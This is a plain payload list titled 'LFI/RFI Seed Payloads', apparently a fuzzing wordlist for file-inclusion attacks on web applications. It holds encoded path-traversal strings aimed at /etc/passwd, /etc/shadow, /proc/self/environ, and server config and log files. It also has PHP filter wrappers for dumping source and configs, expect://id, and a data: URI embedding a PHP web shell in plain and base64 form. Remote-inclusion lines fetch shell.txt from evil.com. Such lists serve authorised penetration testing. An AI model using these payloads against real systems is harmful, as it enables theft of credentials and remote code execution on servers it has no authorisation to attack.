# LFI/RFI Seed Payloads
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
....//....//....//etc/passwd
..\\\\..\\\\..\\\\..\\\\etc\\\\passwd
/etc/passwd%00
../../../../etc/passwd%00
../../../../etc/passwd%2500
../../../../etc/hosts
../../../../etc/shadow
../../../../etc/group
../../../../etc/issue
../../../../etc/motd
../../../../proc/self/environ
../../../../proc/self/fd/0
../../../../proc/self/fd/1
../../../../proc/self/fd/2
../../../../proc/self/cmdline
../../../../proc/version
../../../../proc/cpuinfo
../../../../proc/meminfo
../../../../proc/net/tcp
../../../../proc/net/arp
../../../../proc/mounts
../../../../proc/self/cwd/index.php
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=../config.php
php://filter/read=convert.base64-encode/resource=../../config.php
php://filter/read=string.rot13/resource=index.php
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=/etc/hosts
php://filter/read=convert.base64-encode/resource=/etc/shadow
php://filter/read=convert.base64-encode/resource=/proc/self/environ
php://filter/read=zlib.deflate/convert.base64-encode/resource=index.php
php://filter/read=zlib.inflate/resource=index.php
php://filter/read=convert.iconv.utf-8.utf-7/resource=index.php
file:///etc/passwd
file:///c:/windows/win.ini
file:///c:/boot.ini
file:///c:/windows/system32/drivers/etc/hosts
file:///etc/hosts
file:///proc/self/environ
file:///etc/shadow
file:///var/log/apache2/access.log
file:///var/log/apache/error.log
file:///var/log/nginx/access.log
file:///var/log/nginx/error.log
file:///var/log/httpd/access_log
file:///var/log/httpd/error_log
/proc/self/environ
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
....//....//....//....//....//etc/passwd
..;/..;/..;/..;/etc/passwd
..%252f..%252f..%252f..%252fetc/passwd
..%c0%ae..%c0%ae..%c0%ae..%c0%aeetc/passwd
%252e%252e%252fetc/passwd
%2e%2e%2fetc%2fpasswd
..%5c..%5c..%5c..%5cetc%5cpasswd
..%252f..%252f..%252f..%252fetc/passwd%00
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
%25c0%25ae%25c0%25ae%252fetc/passwd
..%255c..%255c..%255c..%255cetc%255cpasswd
..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63passwd
../../../../windows/win.ini
../../../../boot.ini
../../../../windows/system32/drivers/etc/hosts
../../../../autoexec.bat
../../../../WINDOWS/System32/drivers/etc/hosts
../../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../logs/apache/access.log
../../../../logs/apache/error.log
../../../../var/log/apache2/access.log
../../../../etc/httpd/conf/httpd.conf
../../../../etc/apache2/apache2.conf
../../../../usr/local/apache/conf/httpd.conf
../../../../etc/nginx/nginx.conf
../../../../usr/local/nginx/conf/nginx.conf
../../../../etc/my.cnf
../../../../etc/mysql/my.cnf
../../../../var/lib/mysql/mysql/user.frm
../../../../etc/php.ini
../../../../usr/local/etc/php.ini
../../../../usr/local/php/etc/php.ini
../../../../etc/php5/apache2/php.ini
../../../../etc/php7/apache2/php.ini
../../../../etc/php8/apache2/php.ini
../../../../home/administrator/flag.txt
../../../../home/vagrant/flag.txt
../../../../home/ubuntu/flag.txt
../../../../root/flag.txt
../../../../var/www/html/config.php
../../../../var/www/config.php
../../../../usr/share/wordlists/rockyou.txt
php://input
php://input%00
php://filter/read=convert.base64-encode/resource=php://input
http://evil.com/shell.txt
https://evil.com/shell.txt
http://192.168.1.1/shell.txt
http://localhost/shell.txt
http://127.0.0.1/shell.txt
/data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
data:text/plain,<?php system($_GET['cmd']); ?>
expect://id
ftp://evil.com/shell.txt
dict://evil.com:1337/shell
